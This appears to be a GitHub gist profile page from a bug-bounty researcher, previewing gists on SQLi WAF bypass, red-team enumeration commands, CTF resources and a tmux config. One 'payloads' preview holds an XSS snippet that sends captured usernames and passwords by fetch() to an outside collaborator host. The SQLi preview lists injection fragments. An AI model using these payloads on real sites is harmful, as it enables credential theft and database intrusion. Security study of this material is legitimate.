Skip to content

Instantly share code, notes, and snippets.

View cyberheartmi9's full-sized avatar
:octocat:
Breaking stuff

PikaChu cyberheartmi9

:octocat:
Breaking stuff
369 followers · 23 following
View GitHub Profile
@cyberheartmi9
cyberheartmi9 / gist:b4a4ff0f691be6b5c866450563258e86
Created April 4, 2018 08:40
Beyond SQLi: Obfuscate and Bypas
|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
@cyberheartmi9
cyberheartmi9 / httparchive_parameters_top_1m_2020_11_21.txt
Created November 21, 2020 22:38
This file has been truncated, but you can view the full file.
ver
v
t
id
tid
cid
z
gdpr
_v
jid
@cyberheartmi9
cyberheartmi9 / tmux.conf
Created February 22, 2024 23:01
unbind C-b
set-option -g prefix C-a
bind-key C-a send-prefix
bind | split-window -h
bind - split-window -v
unbind '"'
unbind %
bind r source-file ~/.tmux.conf
@cyberheartmi9
cyberheartmi9 / Bug Bounty methodology
Last active February 2, 2024 12:17
██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║
██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║
██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║
██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝
@intx0x80
@cyberheartmi9
cyberheartmi9 / gist:c296202c4428b65173b870da8b53a386
Created January 7, 2024 18:51 — forked from tehseensagar/gist:d82931fa8427b3b8a8825714b5b113c4
SQLi WAF Bypass All Method
`-=[SQL injection Queries]=-
HOW TO SUCCESSFULLY INJECTING SQL INJECTION
[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5
+div+0
+div false
+Having+1=0+
@cyberheartmi9
cyberheartmi9 / Red-Team-notes
Last active January 6, 2024 03:43
# Enumeration
# Credential Injection
runas.exe /netonly /user:<domain>\<username> cmd.exe
# enumeration users
users
net user /domain
@cyberheartmi9
cyberheartmi9 / CTF-Prep
Last active December 25, 2023 19:44
# pwning
https://pwn.college/
https://www.ret2rop.com/
https://akshitsinghal6399.medium.com/rop-chain-exploit-with-example-7e444939a2ec
https://ironhackers.es/en/tutoriales/pwn-rop-bypass-nx-aslr-pie-y-canary/
https://guyinatuxedo.github.io/
https://github.com/0xmanjoos/Exploit-Development
https://doar-e.github.io/archives.html
https://exploitreversing.com/2023/04/11/exploiting-reversing-er-series/
https://crackmes.one/
@cyberheartmi9
cyberheartmi9 / 🔥Complete Bug Bounty Cheat Sheet🔥
Last active December 13, 2023 00:53
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
@cyberheartmi9
cyberheartmi9 / payloads
Last active October 28, 2023 01:29
########################## xss using postmessage api ###############
<iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')">
################ Exploiting cross-site scripting to capture passwords ############################################
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
#########################hunting phishing site ############################
@cyberheartmi9
cyberheartmi9 / Finding vulnerabilities in PHP scripts FULL
Created April 4, 2018 08:54
Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08@gmail.com
Contents :
1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example